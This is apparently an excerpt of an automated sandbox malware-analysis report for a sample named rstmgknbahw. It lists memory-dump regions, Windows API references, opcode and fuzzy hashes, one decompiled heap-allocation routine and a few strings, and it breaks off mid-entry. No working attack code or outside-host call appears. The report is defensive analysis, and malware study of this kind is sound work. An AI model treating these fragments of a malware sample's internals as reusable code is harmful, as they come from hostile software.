                          • Opcode ID: 6bd4cb523526f045b12ebfeaadac72e785cde6cedaca7cb4c698da7b75484f17
                          • Instruction ID: ff2dd896176b3f41cb68138a5b010c3fa54f6f0c25c520e8f9ae80ecac5b7c7b
                          • Opcode Fuzzy Hash: 6bd4cb523526f045b12ebfeaadac72e785cde6cedaca7cb4c698da7b75484f17
                          • Instruction Fuzzy Hash: DB1172714093809FDB228F55DC84A52FFF4EF49320F08859EED858F562D375A458CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: bd7ca01b9cdcf9815e8ba14b5e95679ca5521bcf79ae010047e6c088d1553b68
                          • Instruction ID: b57aaf5fe8ae8b90817eb67b8ae30b4f926570fa58f4667f73660d57b38355f6
                          • Opcode Fuzzy Hash: bd7ca01b9cdcf9815e8ba14b5e95679ca5521bcf79ae010047e6c088d1553b68
                          • Instruction Fuzzy Hash: AF11C6725093809FD751CF26DC84B56BFE8EF42220F0884AAED49CF252D274E948CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ClassInfo
                          • String ID:
                          • API String ID: 3534257612-0
                          • Opcode ID: f819a0684da673c6d6104f9ce25b8a8b92f8a1fdbc5220c344ea39875d7a331a
                          • Instruction ID: 09a5ac53a4d484c608d01656f2df0c5e394711fd2c07b2b04fb092130a50e968
                          • Opcode Fuzzy Hash: f819a0684da673c6d6104f9ce25b8a8b92f8a1fdbc5220c344ea39875d7a331a
                          • Instruction Fuzzy Hash: 840161756006418FE764DF1AD884B66FBE8EF04720F08C06ADD468B655D774E808CB72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID:
                          • API String ID: 1378638983-0
                          • Opcode ID: ead9245dbbc97c201ed6006af57db45a519157ed10726387715fcd62f9cde25d
                          • Instruction ID: 9dbad1f4c7b2a008d38bceca546b6d0faac343d2dcf6708bf26b0a4a9515a1fd
                          • Opcode Fuzzy Hash: ead9245dbbc97c201ed6006af57db45a519157ed10726387715fcd62f9cde25d
                          • Instruction Fuzzy Hash: 1C11AC314097849FD7218F15DC84B52FFB4EF16320F09849AED858F262D375A818CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: e0742536c27ad5e8ccf8417ebfba3ab0b64fddfc4d5d272ce66ec5d5999220d1
                          • Instruction ID: bb002326c9e196423304caf9d14e68dca4d6ed867305d0b3b57b938dc31b6039
                          • Opcode Fuzzy Hash: e0742536c27ad5e8ccf8417ebfba3ab0b64fddfc4d5d272ce66ec5d5999220d1
                          • Instruction Fuzzy Hash: DD017175A043408FDB60CF6BD885766FB98EF00620F08C4AADD49CF646E678E504CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A606
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 1e4a4f0518c9f515e3215d39810b7d719cee4dd4a9c403961bff95ed6f7936e8
                          • Instruction ID: 969a6bbdcb542ec08a9f20d1426a0d34e3fef69e437f01e5c21e82e4ff8568e7
                          • Opcode Fuzzy Hash: 1e4a4f0518c9f515e3215d39810b7d719cee4dd4a9c403961bff95ed6f7936e8
                          • Instruction Fuzzy Hash: 1D016D315047409FEB218F95D944B56FFE0EF18320F0889AADD494A655E376E418DF62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateIconFromResourceEx.USER32 ref: 00A8BB4A
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateFromIconResource
                          • String ID:
                          • API String ID: 3668623891-0
                          • Opcode ID: 89ed1c753380bf02a11ef599afc4b4c2a2e8b0b9a1542f49c23b45fafe20424f
                          • Instruction ID: 67a253d7e9ad493f9251af1396de8b1d4b25ca91c706521de6363ed927a2b54d
                          • Opcode Fuzzy Hash: 89ed1c753380bf02a11ef599afc4b4c2a2e8b0b9a1542f49c23b45fafe20424f
                          • Instruction Fuzzy Hash: 2F012D71504740DFDB219F95D884B56FFA0FF18320F0889AAEE8A4B626D375E418DB72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A8B11A
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ConsoleCtrlHandler
                          • String ID:
                          • API String ID: 1513847179-0
                          • Opcode ID: cf9b03b051e761fbb051e9cd0874f7b99f3171f3d80fa10855fbc1b23ba321e8
                          • Instruction ID: 5a4972574ad391fce2e12670c6cdad8015a0e796ff4f42b4d3f7d849658436c5
                          • Opcode Fuzzy Hash: cf9b03b051e761fbb051e9cd0874f7b99f3171f3d80fa10855fbc1b23ba321e8
                          • Instruction Fuzzy Hash: AD01A271500601ABD214DF1ADC82B22FBA4FB89B20F14815AED084B741E235F516CBE6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 00A8BF79
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 6698283dc368849411d51a7c251e513994f957a176eb0fcdc02e0e457ddcc8ea
                          • Instruction ID: 2ac262389faa89f39d5a400d5a5fd763937224d61b70b190467e5f14fc822306
                          • Opcode Fuzzy Hash: 6698283dc368849411d51a7c251e513994f957a176eb0fcdc02e0e457ddcc8ea
                          • Instruction Fuzzy Hash: 86019A355103409FDB208F56DC84B66FBA0EF14320F08C0AAEE498AA52D375E818DF72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 00A8BC01
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: d51aad5dc8233c96fb4c56dbb92f57db651b82cd62a0603dffc1581aac4e0f01
                          • Instruction ID: 92dd3889ff47b6fbc09e7ce47db3a7c92644aa3767adaa1dfaefb4a0564fdb88
                          • Opcode Fuzzy Hash: d51aad5dc8233c96fb4c56dbb92f57db651b82cd62a0603dffc1581aac4e0f01
                          • Instruction Fuzzy Hash: D801AD75500744DFDB209F46D884B21FFA0EF18320F08C49ADD894B626D775E458DBB2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID:
                          • API String ID: 1378638983-0
                          • Opcode ID: 3b01d73552b2fd057f31e10ebc3b1d966ec8ca39e5c2e4afeb4d1375c317b528
                          • Instruction ID: a958358ecaafb8d0da6c39bd9b951c09d9dfbea982dfd701dc1e80bfdb6bdcc1
                          • Opcode Fuzzy Hash: 3b01d73552b2fd057f31e10ebc3b1d966ec8ca39e5c2e4afeb4d1375c317b528
                          • Instruction Fuzzy Hash: B001AD355087409FEB208F46D884B11FFA0EF14320F08C49ADD490B656D379E418DB73
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DispatchMessageW.USER32(?), ref: 04C70270
                          Memory Dump Source
                          • Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DispatchMessage
                          • String ID:
                          • API String ID: 2061451462-0
                          • Opcode ID: 93b473ca2d06503f998d192e0505e4b85c2acc8e31a8a0b09c5b439bce815417
                          • Instruction ID: 6d2b5640cb1d67844a5554eed7f36f256799207f40f38c208be1da04110c9bd7
                          • Opcode Fuzzy Hash: 93b473ca2d06503f998d192e0505e4b85c2acc8e31a8a0b09c5b439bce815417
                          • Instruction Fuzzy Hash: AFF0AF369087408FDB608F07D884761FFA0EF04321F08C0AADE494F656E379E508CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00403E3D(void* __ecx, long _a4) {
                          				void* _t4;
                          				void* _t6;
                          				void* _t7;
                          				long _t8;
                          
                          				_t7 = __ecx;
                          				_t8 = _a4;
                          				if(_t8 > 0xffffffe0) {
                          					L7:
                          					 *((intOrPtr*)(E00404831())) = 0xc;
                          					__eflags = 0;
                          					return 0;
                          				}
                          				if(_t8 == 0) {
                          					_t8 = _t8 + 1;
                          				}
                          				while(1) {
                          					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                          					if(_t4 != 0) {
                          						break;
                          					}
                          					__eflags = E00403829();
                          					if(__eflags == 0) {
                          						goto L7;
                          					}
                          					_t6 = E004068FD(_t7, __eflags, _t8);
                          					_pop(_t7);
                          					__eflags = _t6;
                          					if(_t6 == 0) {
                          						goto L7;
                          					}
                          				}
                          				return _t4;
                          			}







                          0x00403e3d
                          0x00403e43
                          0x00403e49
                          0x00403e7b
                          0x00403e80
                          0x00403e86
                          0x00000000
                          0x00403e86
                          0x00403e4d
                          0x00403e4f
                          0x00403e4f
                          0x00403e66
                          0x00403e6f
                          0x00403e77
                          0x00000000
                          0x00000000
                          0x00403e57
                          0x00403e59
                          0x00000000
                          0x00000000
                          0x00403e5c
                          0x00403e61
                          0x00403e62
                          0x00403e64
                          0x00000000
                          0x00000000
                          0x00403e64
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                          • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                          • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                          • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.734600924.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a82000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pfq
                          • API String ID: 0-2270722601
                          • Opcode ID: ebb7f73d967e624c198de43f41c75e5b01ca4808c2c64b9c5203b6b3888ac3c7
                          • Instruction ID: aff7e5c8eabaa75a4a72b81a1f308e5762812ba5cf155b6535dba0a640078812
                          • Opcode Fuzzy Hash: ebb7f73d967e624c198de43f41c75e5b01ca4808c2c64b9c5203b6b3888ac3c7
                          • Instruction Fuzzy Hash: AB71B37698D3C19FDB176B3498353A4BF70AF67321B4A40DBD4808F1E3D2285949C766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: :@fq
                          • API String ID: 0-3673016210
                          • Opcode ID: e027219d83dce205b0150e9c22fd7cd85d24818f0cc2997ea8f4654f32bd3b26
                          • Instruction ID: 60ed09e234b05baf5d4c59b264ec547866885b5bbfb2db3b47f5408295aa1a27
                          • Opcode Fuzzy Hash: e027219d83dce205b0150e9c22fd7cd85d24818f0cc2997ea8f4654f32bd3b26
                          • Instruction Fuzzy Hash: DD51BD34B052158FCB05DF69C4547BEBBF2EF89300F2484A9D4069B365EA75AC06CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: r*+
                          • API String ID: 0-3221063712
                          • Opcode ID: 6b91ed783531d74df55493a51ba1f2254d1092d01806a9aea1c608ffd2ede93f
                          • Instruction ID: 1a31e6075ae6d593aea0e06f4cfcc23144db7bd275158f8abcba36099295528f
                          • Opcode Fuzzy Hash: 6b91ed783531d74df55493a51ba1f2254d1092d01806a9aea1c608ffd2ede93f
                          • Instruction Fuzzy Hash: 90411C30E04209DFCF49DBA6C5456BEBBB6FB45300F1088BAD412A7265EB34AA05DF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f127c4ec0c7a6fd4dbfc9cf6c7c232b07017c553eaaa4e7992b5249192732685
                          • Instruction ID: f6fd0de1abbc1f4e2aec3eede310e45959888664f37381e71f3c8bd5a7453673
                          • Opcode Fuzzy Hash: f127c4ec0c7a6fd4dbfc9cf6c7c232b07017c553eaaa4e7992b5249192732685
                          • Instruction Fuzzy Hash: 2222D138A00A45CFCB25DF25C580A6AB7F2FF88310F50C9A9D85A9B75ADB34AD45CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09016016ef10a8c1e038592b0de5df5ee2b882956ede546e5a6042760d6d7afb
                          • Instruction ID: 0d072a71b0b59e24b3d6a0ee93cec634f5aeb09958bfbaf6d1d90b21b98826f0
                          • Opcode Fuzzy Hash: 09016016ef10a8c1e038592b0de5df5ee2b882956ede546e5a6042760d6d7afb
                          • Instruction Fuzzy Hash: E151E131B00265EFCF159BA9D854ABEB7F3BF84304F248566E4469B250DBB0AC02CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aebfa0358f47f2649f6abff4e567bead16b098a5ee655653cedffd4bfcccb9de
                          • Instruction ID: 24c0a25d9428d13f4633afddfc9c95df8aae11d4bf5fd6b0dd3d7e4fbad8d0cc
                          • Opcode Fuzzy Hash: aebfa0358f47f2649f6abff4e567bead16b098a5ee655653cedffd4bfcccb9de
                          • Instruction Fuzzy Hash: 3A410331B011188FC7169B6AC4147BE77F7AF85300F15846AE80AAF3A0DEB1ED069791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4630b473a7e37ef2b7ec0d16f62a9e9034b4009322f7c32a4ca736f4952cf54
                          • Instruction ID: fc37a6ccf54a79493b6b2a41f6a786510052ed73bf3127848d0aab9f5ec66d2c
                          • Opcode Fuzzy Hash: e4630b473a7e37ef2b7ec0d16f62a9e9034b4009322f7c32a4ca736f4952cf54
                          • Instruction Fuzzy Hash: A2511834A01258CFDB15EF64C894BADBBB2BF88300F5081E9D40AAB365DB35AD84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 598f7e8bf6234574878603a2bd9d8ccdc8d505a79fa4d2f444147c9f2481ab33
                          • Instruction ID: 949ec01f06ed6c88b838925d6a496cbca68859bb6b7d000bc33029a1d2d83cbf
                          • Opcode Fuzzy Hash: 598f7e8bf6234574878603a2bd9d8ccdc8d505a79fa4d2f444147c9f2481ab33
                          • Instruction Fuzzy Hash: 9241033430C295DFC3178B2BC898A397FBEAF42200B1989FBD056CB262DA61EC05D751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9da960f01bdbd2980fe3efe61854fb45396d71cf47ef78876e4d7bd5896e404e
                          • Instruction ID: 001cbdd6598b70dd657e63456ea83c6953d04f8274f2fc29c660b0ee21363d51
                          • Opcode Fuzzy Hash: 9da960f01bdbd2980fe3efe61854fb45396d71cf47ef78876e4d7bd5896e404e
                          • Instruction Fuzzy Hash: 34318D74B01215CFDB15CF69C194BBE7BB6EF88310F144879D402AB3A5EBB1AC458B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8550be333fa837cfc11fd51c6603034c6d5572a699a0d48b3a3b1b96d811127
                          • Instruction ID: e0bfb5e77914ebd2ab0763bfca1c3b8222cc79e76bf14c726de180e442d0595d
                          • Opcode Fuzzy Hash: b8550be333fa837cfc11fd51c6603034c6d5572a699a0d48b3a3b1b96d811127
                          • Instruction Fuzzy Hash: A2412A34A04258CFDB25DF65C885BADBBB2BF49340F1084EAD44AAB355EB30AD84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2308552233e869b900b3501c7aea647ed9949f61e9710bdf3e5e8fc1802e5cfb
                          • Instruction ID: b289613e3270c7390e4ab637eff3d2d06959413922d6355eff902e99eb7a1f70
                          • Opcode Fuzzy Hash: 2308552233e869b900b3501c7aea647ed9949f61e9710bdf3e5e8fc1802e5cfb
                          • Instruction Fuzzy Hash: 36316130B05249DFCB06DFA9C880A7E7BBAEB85340B2184E6C5159B295E731AD41DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a22637e19fd0ad47bd4db25deb1f2174468ae424670ed97c51d5815b3c1977a
                          • Instruction ID: fdb23f9a82d3cd68bedb2265e90c6914feeaeccf098865ad24e8f721ecd17290
                          • Opcode Fuzzy Hash: 1a22637e19fd0ad47bd4db25deb1f2174468ae424670ed97c51d5815b3c1977a
                          • Instruction Fuzzy Hash: 0931507020D3C18FCB06AB7498645697FF1EE82345B0988ABD4C2CB597EE799C09DB13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f1a2510466910ca782b289807f793757167a463d81b152e37da2c86e37a62d58
                          • Instruction ID: e8152a40a33950adb07b94d73d71ba7cc9d1f7d903e679c423bfe9e8eac67fed
                          • Opcode Fuzzy Hash: f1a2510466910ca782b289807f793757167a463d81b152e37da2c86e37a62d58
                          • Instruction Fuzzy Hash: 4B318F31A00245CFDB21DFA6C8443AABBF6BF85304F24C26AC004AB265DB74A58ACF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 853732d53f00f21a7d2d920ce529f0239a20a1d8cda88eb1b9c0c6186ba20fea
                          • Instruction ID: 20f1de74787ab886dfe4d82ab4c50175ccdd3da1ddf04c70f415a2e658f715f9
                          • Opcode Fuzzy Hash: 853732d53f00f21a7d2d920ce529f0239a20a1d8cda88eb1b9c0c6186ba20fea
                          • Instruction Fuzzy Hash: AC314C70E08209DFCB49DBB5C1446BDBBB6FF45300F1048BAD402AB366EA35AA05DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48a64b1117d26d536af088b704051a9deb375eefbe09fbeaa4a71416e341ab1d
                          • Instruction ID: ddfe0622c4139eb408a20c85185de0a719a92a29461ea7d4d77ddcddc4b93081
                          • Opcode Fuzzy Hash: 48a64b1117d26d536af088b704051a9deb375eefbe09fbeaa4a71416e341ab1d
                          • Instruction Fuzzy Hash: 39110631B002168BDB15EBF6D8046BF76BBAF95340F51493BD40797345EE75A80097A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9378db7ec5161cb1260848d91e21f3a1c68c3fcbdd8af16d3aecd0c43310587d
                          • Instruction ID: 03299b10f523456804bc9b2eb9b2fba84e227168c9d45d5b6e5bbe0fb9d10e2e
                          • Opcode Fuzzy Hash: 9378db7ec5161cb1260848d91e21f3a1c68c3fcbdd8af16d3aecd0c43310587d
                          • Instruction Fuzzy Hash: 76012B3170C2A4DBCF1657B7A804CBA7B6BCAF625070049BBC41687101EA77E4069651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83479d5770338ea2d374352a51d27774649b667ef9d95dbc274e9cd80cd3f1a3
                          • Instruction ID: b825d4f941680cee3b9f34dcd0621e36ed5dfc9d536c601b0fa3930ff2ea80fb
                          • Opcode Fuzzy Hash: 83479d5770338ea2d374352a51d27774649b667ef9d95dbc274e9cd80cd3f1a3
                          • Instruction Fuzzy Hash: C711B430204780DFD715CB58C940BA6BBA9EB89718F24C9ACE9490B647CB7FD803CA51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24f41c560e62931a4837cc3facb65ac363ecb0c1b4b4bdccfbd6d0fc9d9f212c
                          • Instruction ID: 65dc63d360c25c6c3805eee48c035858ecc3606a64d43ea95795c25e02ebdf9d
                          • Opcode Fuzzy Hash: 24f41c560e62931a4837cc3facb65ac363ecb0c1b4b4bdccfbd6d0fc9d9f212c
                          • Instruction Fuzzy Hash: 4B115A303092808FC7169B2988599797FE6AF8620071985FAE446CB3A7CA75AC099752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6614eb15f3f64e6bed8b4e8e8ac1f3d55d7856521f305a56655163443dcbd44
                          • Instruction ID: f5d3914da887aebf88697d8abbb8d0700d1a8594c00854dd544de40f4baae157
                          • Opcode Fuzzy Hash: e6614eb15f3f64e6bed8b4e8e8ac1f3d55d7856521f305a56655163443dcbd44
                          • Instruction Fuzzy Hash: 0901D1213001604BCB0A367D54222BE179B9BCAA58768446EE006EB396DD68AC0B53EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d7736ee3a51db5f9ed2d1fb8493030afb404ba5d892851bcfdb0a09af39103a
                          • Instruction ID: 2acc43909a05538d5c3cae3797a5b5cd38d3ab61c294677d172ae20c87294892
                          • Opcode Fuzzy Hash: 6d7736ee3a51db5f9ed2d1fb8493030afb404ba5d892851bcfdb0a09af39103a
